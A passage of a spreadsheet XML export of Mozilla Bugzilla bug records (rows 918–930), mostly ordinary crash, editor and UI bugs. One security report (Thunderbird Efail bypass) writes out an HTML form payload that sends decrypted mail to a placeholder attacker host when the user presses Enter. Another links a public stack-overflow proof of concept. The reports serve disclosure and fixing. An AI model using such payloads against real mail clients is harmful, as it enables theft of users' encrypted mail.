      <c r="K918" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L918" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M918" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N918" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O918" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P918" t="inlineStr">
        <is>
          <t>[adv-main36+] gfx-noted</t>
        </is>
      </c>
      <c r="Q918" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R918" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S918" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T918" t="n">
        <v>1</v>
      </c>
      <c r="U918" t="n">
        <v>0</v>
      </c>
      <c r="V918" t="n">
        <v>27</v>
      </c>
      <c r="W918" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-adf37f72-5201-47ea-ada3-087122141231.
=============================================================
Highly repeatable at http://diskdetective.org
Hit the icon that looks like an open book, scroll around in the help (and other techniques as well).
The addresses from a crashreporter search aren't good....
Milan; please find the right people</t>
        </is>
      </c>
      <c r="X918" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="919">
      <c r="A919" t="n">
        <v>1469978</v>
      </c>
      <c r="B919" t="inlineStr">
        <is>
          <t>2018-06-20 13:29:39 -0700</t>
        </is>
      </c>
      <c r="C919" t="inlineStr">
        <is>
          <t>[traceback] NoReverseMatch for manage:home on profile page</t>
        </is>
      </c>
      <c r="D919" t="inlineStr">
        <is>
          <t>2018-07-11 10:20:45 -0700</t>
        </is>
      </c>
      <c r="E919" t="n">
        <v>1</v>
      </c>
      <c r="F919" t="n">
        <v>1</v>
      </c>
      <c r="G919" t="n">
        <v>4</v>
      </c>
      <c r="H919" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I919" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J919" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K919" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L919" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M919" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N919" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O919" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P919" t="inlineStr"/>
      <c r="Q919" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R919" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S919" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T919" t="n">
        <v>1</v>
      </c>
      <c r="U919" t="n">
        <v>0</v>
      </c>
      <c r="V919" t="n">
        <v>3</v>
      </c>
      <c r="W919" t="inlineStr">
        <is>
          <t>Going to the profile page when logged in kicks up this issue:
https://sentry.prod.mozaws.net/operations/socorro-new-stage/issues/4407684/
"""
NoReverseMatch: u'manage' is not a registered namespace
  File "django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "crashstats/crashstats/decorators.py", line 99, in inner
    return view(request, *args, **kwargs)
  File "django/contrib/auth/decorators.py", line 23, in _wrapped_view
    return view_func(request, *args, **kwargs)
  File "crashstats/profile/views.py", line 39, in profile
    return render(request, 'profile/profile.html', context)
  File "django/shortcuts.py", line 30, in render
    content = loader.render_to_string(template_name, context, request, using=using)
  File "django/template/loader.py", line 68, in render_to_string
    return template.render(context, request)
  File "django_jinja/backend.py", line 106, in render
    return mark_safe(self.template.render(context))
  File "jinja2/environment.py", line 1008, in render
    return self.environment.handle_exception(exc_info, True)
  File "jinja2/environment.py", line 780, in handle_exception
    reraise(exc_type, exc_value, tb)
  File "/app/webapp-django/crashstats/profile/jinja2/profile/profile.html", line 1, in top-level template code
    {% extends "crashstats_base.html" %}
  File "/app/webapp-django/crashstats/base/jinja2/crashstats_base.html", line 149, in top-level template code
    {% block content %}{% endblock %}
  File "/app/webapp-django/crashstats/profile/jinja2/profile/profile.html", line 23, in block "content"
    &lt;a href="{{ url('manage:home') }}"&gt;Admin&lt;/a&gt;
  File "crashstats/base/templatetags/jinja_helpers.py", line 36, in url
    return reverse(viewname, args=args, kwargs=kwargs)
  File "django/urls/base.py", line 87, in reverse
    raise NoReverseMatch("%s is not a registered namespace" % key)
"""</t>
        </is>
      </c>
      <c r="X919" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="920">
      <c r="A920" t="n">
        <v>38110</v>
      </c>
      <c r="B920" t="inlineStr">
        <is>
          <t>2000-05-03 16:24:13 -0700</t>
        </is>
      </c>
      <c r="C920" t="inlineStr">
        <is>
          <t>Composer Colorpicker: Allow user to select a color not in color swatch table</t>
        </is>
      </c>
      <c r="D920" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E920" t="n">
        <v>1</v>
      </c>
      <c r="F920" t="n">
        <v>1</v>
      </c>
      <c r="G920" t="n">
        <v>3</v>
      </c>
      <c r="H920" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I920" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J920" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K920" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L920" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M920" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N920" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O920" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P920" t="inlineStr">
        <is>
          <t>[nsbeta2-]</t>
        </is>
      </c>
      <c r="Q920" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R920" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S920" t="inlineStr">
        <is>
          <t>Future</t>
        </is>
      </c>
      <c r="T920" t="n">
        <v>1</v>
      </c>
      <c r="U920" t="n">
        <v>0</v>
      </c>
      <c r="V920" t="n">
        <v>16</v>
      </c>
      <c r="W920" t="inlineStr">
        <is>
          <t>Composer crahses after you put your mouse on the custom color text box</t>
        </is>
      </c>
      <c r="X920" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="921">
      <c r="A921" t="n">
        <v>301490</v>
      </c>
      <c r="B921" t="inlineStr">
        <is>
          <t>2005-07-20 14:22:54 -0700</t>
        </is>
      </c>
      <c r="C921" t="inlineStr">
        <is>
          <t>Rich text editor property useCSS changed meaning</t>
        </is>
      </c>
      <c r="D921" t="inlineStr">
        <is>
          <t>2006-03-12 18:43:20 -0800</t>
        </is>
      </c>
      <c r="E921" t="n">
        <v>1</v>
      </c>
      <c r="F921" t="n">
        <v>1</v>
      </c>
      <c r="G921" t="n">
        <v>3</v>
      </c>
      <c r="H921" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I921" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J921" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K921" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L921" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M921" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N921" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O921" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P921" t="inlineStr"/>
      <c r="Q921" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R921" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S921" t="inlineStr">
        <is>
          <t>mozilla1.8beta4</t>
        </is>
      </c>
      <c r="T921" t="n">
        <v>1</v>
      </c>
      <c r="U921" t="n">
        <v>1</v>
      </c>
      <c r="V921" t="n">
        <v>35</v>
      </c>
      <c r="W921" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b3) Gecko/20050712 Firefox/1.0+
The useCSS property of the embedded rich text editor has changed its meaning 
(true is now false and vice versa). This breaks almost every online WYSIWYG 
editor online with respect to clean HTML code generation.
The readonly property is also affected in the same way.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.mozilla.org/editor/midasdemo/
2. Notice how the "Use CSS" does exactly the opposite of what it is told
3. Also notice the same problem occurs with the "Read only" checkbox
Actual Results:  
The editor used css for things like bold and italic when "Use CSS" was turned 
off and standard HTML tags when "Use CSS" was on.
Expected Results:  
The editor should have used css for things like bold and italic when "Use CSS" 
was turned on and standard HTML tags when "Use CSS" was off</t>
        </is>
      </c>
      <c r="X921" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="922">
      <c r="A922" t="n">
        <v>199502</v>
      </c>
      <c r="B922" t="inlineStr">
        <is>
          <t>2003-03-27 10:40:59 -0800</t>
        </is>
      </c>
      <c r="C922" t="inlineStr">
        <is>
          <t>It's possible to take down Bugzilla by changing the languages param</t>
        </is>
      </c>
      <c r="D922" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:35 -0800</t>
        </is>
      </c>
      <c r="E922" t="n">
        <v>1</v>
      </c>
      <c r="F922" t="n">
        <v>1</v>
      </c>
      <c r="G922" t="n">
        <v>4</v>
      </c>
      <c r="H922" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I922" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J922" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K922" t="inlineStr">
        <is>
          <t>2.17.3</t>
        </is>
      </c>
      <c r="L922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N922" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O922" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P922" t="inlineStr"/>
      <c r="Q922" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R922" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S922" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T922" t="n">
        <v>1</v>
      </c>
      <c r="U922" t="n">
        <v>0</v>
      </c>
      <c r="V922" t="n">
        <v>25</v>
      </c>
      <c r="W922" t="inlineStr">
        <is>
          <t>The languages param is a comma-separated list of the language packs you wish to
use on your Bugzilla site.  In order to list something there, you have to have a
directory by that name within the template directory.
Problem is, there is no validation check to ensure that the directory names you
enter in that param actually exist.  And if you fail to list "en" and you don't
have anything else there, it blindly sets it, and then you can't get back in to
fix it unless you have shell access.
This is a major problem if you have someone with admin rights that doesn't have
shell access.</t>
        </is>
      </c>
      <c r="X922" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="923">
      <c r="A923" t="n">
        <v>831972</v>
      </c>
      <c r="B923" t="inlineStr">
        <is>
          <t>2013-01-17 12:48:03 -0800</t>
        </is>
      </c>
      <c r="C923" t="inlineStr">
        <is>
          <t>Story - Crash reporting</t>
        </is>
      </c>
      <c r="D923" t="inlineStr">
        <is>
          <t>2019-01-02 07:21:12 -0800</t>
        </is>
      </c>
      <c r="E923" t="n">
        <v>1</v>
      </c>
      <c r="F923" t="n">
        <v>1</v>
      </c>
      <c r="G923" t="n">
        <v>6</v>
      </c>
      <c r="H923" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I923" t="inlineStr">
        <is>
          <t>Tracking Graveyard</t>
        </is>
      </c>
      <c r="J923" t="inlineStr">
        <is>
          <t>Metro Operations</t>
        </is>
      </c>
      <c r="K923" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L923" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M923" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N923" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O923" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P923" t="inlineStr">
        <is>
          <t>feature=story c=feedback u=metro_firefox_user p=8</t>
        </is>
      </c>
      <c r="Q923" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R923" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S923" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T923" t="n">
        <v>1</v>
      </c>
      <c r="U923" t="n">
        <v>0</v>
      </c>
      <c r="V923" t="n">
        <v>42</v>
      </c>
      <c r="W923" t="inlineStr">
        <is>
          <t>Created attachment 703542
UC-147 	 Crash reporting</t>
        </is>
      </c>
      <c r="X923" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="924">
      <c r="A924" t="n">
        <v>838051</v>
      </c>
      <c r="B924" t="inlineStr">
        <is>
          <t>2013-02-04 20:07:52 -0800</t>
        </is>
      </c>
      <c r="C924" t="inlineStr">
        <is>
          <t>[Contacts][User Story] GMail contact import</t>
        </is>
      </c>
      <c r="D924" t="inlineStr">
        <is>
          <t>2013-10-01 13:22:47 -0700</t>
        </is>
      </c>
      <c r="E924" t="n">
        <v>1</v>
      </c>
      <c r="F924" t="n">
        <v>1</v>
      </c>
      <c r="G924" t="n">
        <v>6</v>
      </c>
      <c r="H924" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I924" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J924" t="inlineStr">
        <is>
          <t>Gaia::Contacts</t>
        </is>
      </c>
      <c r="K924" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L924" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M924" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N924" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O924" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P924" t="inlineStr">
        <is>
          <t>leorun3,relnote-b2g:1.1+</t>
        </is>
      </c>
      <c r="Q924" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R924" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S924" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T924" t="n">
        <v>1</v>
      </c>
      <c r="U924" t="n">
        <v>0</v>
      </c>
      <c r="V924" t="n">
        <v>27</v>
      </c>
      <c r="W924" t="inlineStr">
        <is>
          <t>UCID: Contacts-002
User Story:
As a user, I want to be able to import my contacts from GMail so that I can easily connect with my friends without manually adding contacts.</t>
        </is>
      </c>
      <c r="X924" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="925">
      <c r="A925" t="n">
        <v>1462910</v>
      </c>
      <c r="B925" t="inlineStr">
        <is>
          <t>2018-05-19 07:42:35 -0700</t>
        </is>
      </c>
      <c r="C925" t="inlineStr">
        <is>
          <t>Efail: Using form to exfiltrate encrypted mail part by pressing enter in form field</t>
        </is>
      </c>
      <c r="D925" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:22 -0800</t>
        </is>
      </c>
      <c r="E925" t="n">
        <v>1</v>
      </c>
      <c r="F925" t="n">
        <v>1</v>
      </c>
      <c r="G925" t="n">
        <v>2</v>
      </c>
      <c r="H925" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I925" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J925" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K925" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L925" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M925" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N925" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O925" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P925" t="inlineStr"/>
      <c r="Q925" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R925" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S925" t="inlineStr">
        <is>
          <t>Thunderbird 62.0</t>
        </is>
      </c>
      <c r="T925" t="n">
        <v>1</v>
      </c>
      <c r="U925" t="n">
        <v>0</v>
      </c>
      <c r="V925" t="n">
        <v>26</v>
      </c>
      <c r="W925" t="inlineStr">
        <is>
          <t>Created attachment 8979029
poc-efail-bypass-enter
One exfiltration method to exploit the efail vuln is to build a form with a textarea tag that contains an encrypted mail part.
However Thunderbird tries to prevent sending forms with data. Until Thunderbird 52.7.0 it was possible to send a form with a &lt;buttom type="submit"&gt;. This was fixed in 52.8.0.
I found however another bypass that still works in 52.8.0 and that allows to send the form content with minor user interaction (actually, the user has to press "Enter" once).
A form can not only be sent by clicking, but also by pressing enter within a text input field.
So in order to exfiltrate an attacker can have a first HTML part like this:
&lt;form action="https://[attackerhost]" method="GET"&gt;
&lt;input type=text name="aa" value="press enter" autofocus&gt;
&lt;textarea name="bb"&gt;
Then comes the encrypted MIME part and then just a
&lt;/textarea&gt;&lt;/form&gt;
to close the tags as the last mail part.
The autofocus makes sure after opening the mail the cursor is already in the text field. Pressing enter will cause a GET request that passes the whole content of the encrypted part to [attackerhost].
Obviously it's possible to try to redesign the mail in order to increase the chance to get an Enter press from the user. E.g. one can hide the textarea (opacity:0) and maybe think of plausible things to display that may cause a user to press enter.
In terms of better fixes, I believe allowing HTML forms to exist within HTML mails is a risky thing to begin with. Ideally I'd propose to filter out all form-related HTML tags before rendering a mail.
Apart from that I believe different parts of a mail shouldn't be rendered within one HTML context. (Though I heard that TB is already working on changing this.)
Furthermore I think it should be considered not allowing half-encrypted mails at all. Encryption should be an "all or nothing", i.e. displaying a mix of encrypted and unencrypted content seems inherently risky.
[1] https://hg.mozilla.org/comm-central/rev/48d7285be1417167d9e230f28b7c7a85db1f4a53</t>
        </is>
      </c>
      <c r="X925" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="926">
      <c r="A926" t="n">
        <v>1306103</v>
      </c>
      <c r="B926" t="inlineStr">
        <is>
          <t>2016-09-28 13:20:55 -0700</t>
        </is>
      </c>
      <c r="C926" t="inlineStr">
        <is>
          <t>Missing NULL check in PK11_SignWithSymKey / ssl3_ComputeRecordMACConstantTime causes server crash</t>
        </is>
      </c>
      <c r="D926" t="inlineStr">
        <is>
          <t>2021-05-11 11:58:18 -0700</t>
        </is>
      </c>
      <c r="E926" t="n">
        <v>1</v>
      </c>
      <c r="F926" t="n">
        <v>1</v>
      </c>
      <c r="G926" t="n">
        <v>3</v>
      </c>
      <c r="H926" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I926" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J926" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K926" t="inlineStr">
        <is>
          <t>3.24</t>
        </is>
      </c>
      <c r="L926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N926" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O926" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P926" t="inlineStr"/>
      <c r="Q926" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R926" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S926" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T926" t="n">
        <v>1</v>
      </c>
      <c r="U926" t="n">
        <v>0</v>
      </c>
      <c r="V926" t="n">
        <v>21</v>
      </c>
      <c r="W926" t="inlineStr">
        <is>
          <t>We've received a report, that an NSS server can be crashed, by a client that sends an invalid DH key.
#0  PK11_SignWithSymKey (symKey=0x0, mechanism=3461563235, param=param@entry=0x7ffff2037e30, sig=sig@entry=0x7ffff2037e70, data=data@entry=0x7ffff2037e50)
    at pk11obj.c:792
#1  0x00007ffff7bb347d in ssl3_ComputeRecordMACConstantTime (outLen=0x7ffff2037e1c, outbuf=0x7ffff2037ec0 "P\001", originalLen=40, inputLen=40,
    input=0x6a3d30 "SCRUBBED", headerLen=13,
    header=0x7ffff2037eb0 "", useServerMacKey=0, spec=0x69dfd0) at ssl3con.c:2539
Marking as a sensitive bug for now, as this seems to enable remote denial of service.</t>
        </is>
      </c>
      <c r="X926" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="927">
      <c r="A927" t="n">
        <v>504343</v>
      </c>
      <c r="B927" t="inlineStr">
        <is>
          <t>2009-07-15 09:38:19 -0700</t>
        </is>
      </c>
      <c r="C927" t="inlineStr">
        <is>
          <t>Firefox 3.5 unicode stack overflow POC</t>
        </is>
      </c>
      <c r="D927" t="inlineStr">
        <is>
          <t>2009-07-17 05:35:24 -0700</t>
        </is>
      </c>
      <c r="E927" t="n">
        <v>1</v>
      </c>
      <c r="F927" t="n">
        <v>1</v>
      </c>
      <c r="G927" t="n">
        <v>2</v>
      </c>
      <c r="H927" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I927" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J927" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K927" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L927" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M927" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N927" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O927" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P927" t="inlineStr">
        <is>
          <t>[sg:dupe 504342]</t>
        </is>
      </c>
      <c r="Q927" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R927" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S927" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T927" t="n">
        <v>0</v>
      </c>
      <c r="U927" t="n">
        <v>1</v>
      </c>
      <c r="V927" t="n">
        <v>5</v>
      </c>
      <c r="W927" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
I found this POC http://www.milw0rm.com/exploits/9158 of a "new" discovered Stack Overflow, as I can see if this bug is already filled (security  flag) I resolved to create a new one.
Reproducible: Always
Steps to Reproduce:
1.Run the code in showed in the POC
2.
3.
Actual Results:  
Crash
Expected Results:  
Not Crash
Link of the POC http://www.milw0rm.com/exploits/9158</t>
        </is>
      </c>
      <c r="X927" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="928">
      <c r="A928" t="n">
        <v>3806</v>
      </c>
      <c r="B928" t="inlineStr">
        <is>
          <t>1999-03-16 08:58:40 -0800</t>
        </is>
      </c>
      <c r="C928" t="inlineStr">
        <is>
          <t>Single signon asks questions on the console</t>
        </is>
      </c>
      <c r="D928" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E928" t="n">
        <v>1</v>
      </c>
      <c r="F928" t="n">
        <v>1</v>
      </c>
      <c r="G928" t="n">
        <v>2</v>
      </c>
      <c r="H928" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I928" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J928" t="inlineStr">
        <is>
          <t>Passwords &amp; Permissions</t>
        </is>
      </c>
      <c r="K928" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L928" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M928" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N928" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O928" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P928" t="inlineStr"/>
      <c r="Q928" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R928" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S928" t="inlineStr">
        <is>
          <t>M3</t>
        </is>
      </c>
      <c r="T928" t="n">
        <v>1</v>
      </c>
      <c r="U928" t="n">
        <v>0</v>
      </c>
      <c r="V928" t="n">
        <v>9</v>
      </c>
      <c r="W928" t="inlineStr">
        <is>
          <t>This makes it look like every form is hanging.
We need to fix it.
Options I can this of are:
- add a pref that will control SinglSignon off/on and
turn it off by default.
- use dialogs</t>
        </is>
      </c>
      <c r="X928" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="929">
      <c r="A929" t="n">
        <v>1403867</v>
      </c>
      <c r="B929" t="inlineStr">
        <is>
          <t>2017-09-28 02:09:40 -0700</t>
        </is>
      </c>
      <c r="C929" t="inlineStr">
        <is>
          <t>Private Browsing/Accessibility indicator makes the menu toolbar too large</t>
        </is>
      </c>
      <c r="D929" t="inlineStr">
        <is>
          <t>2017-11-01 02:37:11 -0700</t>
        </is>
      </c>
      <c r="E929" t="n">
        <v>1</v>
      </c>
      <c r="F929" t="n">
        <v>1</v>
      </c>
      <c r="G929" t="n">
        <v>2</v>
      </c>
      <c r="H929" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I929" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J929" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K929" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L929" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M929" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N929" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O929" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P929" t="inlineStr"/>
      <c r="Q929" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R929" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S929" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T929" t="n">
        <v>1</v>
      </c>
      <c r="U929" t="n">
        <v>0</v>
      </c>
      <c r="V929" t="n">
        <v>32</v>
      </c>
      <c r="W929" t="inlineStr">
        <is>
          <t>Created attachment 8913116
Windows 7 - Private Browsing
[Tracking Requested - why for this release]:
Visible regression that potentially worsens the Photon experience for a non-trivial amount of users.
I first saw this on https://www.reddit.com/r/firefox/comments/72xvh6/why_does_firefox_now_look_like_internet_explorer/
This user has the menu bar enabled and an accessibility indicator turned on. The accessibility indicator takes up too much vertical space, which makes the tabs toolbar look way too large. This obviously also happens with the private browsing indicator.
Windows 10 also seems affected, but the added space is much smaller and I think we could live with that.
I attached some screenshots of my own.
It's hard to say, really, but I think this could affect a non-trivial amount of users. Windows 7 is 46% of our user base and anecdotally I believe that a lot of them have the menu bar enabled. Would be nice to know.
Yura, can you take a look at this please?</t>
        </is>
      </c>
      <c r="X929" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="930">
      <c r="A930" t="n">
        <v>313196</v>
      </c>
      <c r="B930" t="inlineStr">
        <is>
          <t>2005-10-20 14:36:01 -0700</t>
        </is>
      </c>
      <c r="C930" t="inlineStr">
        <is>
          <t>HMAC SHA-384 and HMAC SHA-512 should use 128-byte block size</t>
        </is>
      </c>
      <c r="D930" t="inlineStr">
        <is>
          <t>2005-11-07 11:03:39 -0800</t>
        </is>
      </c>
      <c r="E930" t="n">
        <v>1</v>
      </c>
      <c r="F930" t="n">
        <v>1</v>
      </c>
      <c r="G930" t="n">
        <v>3</v>
      </c>
      <c r="H930" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I930" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J930" t="inlineStr">
        <is>
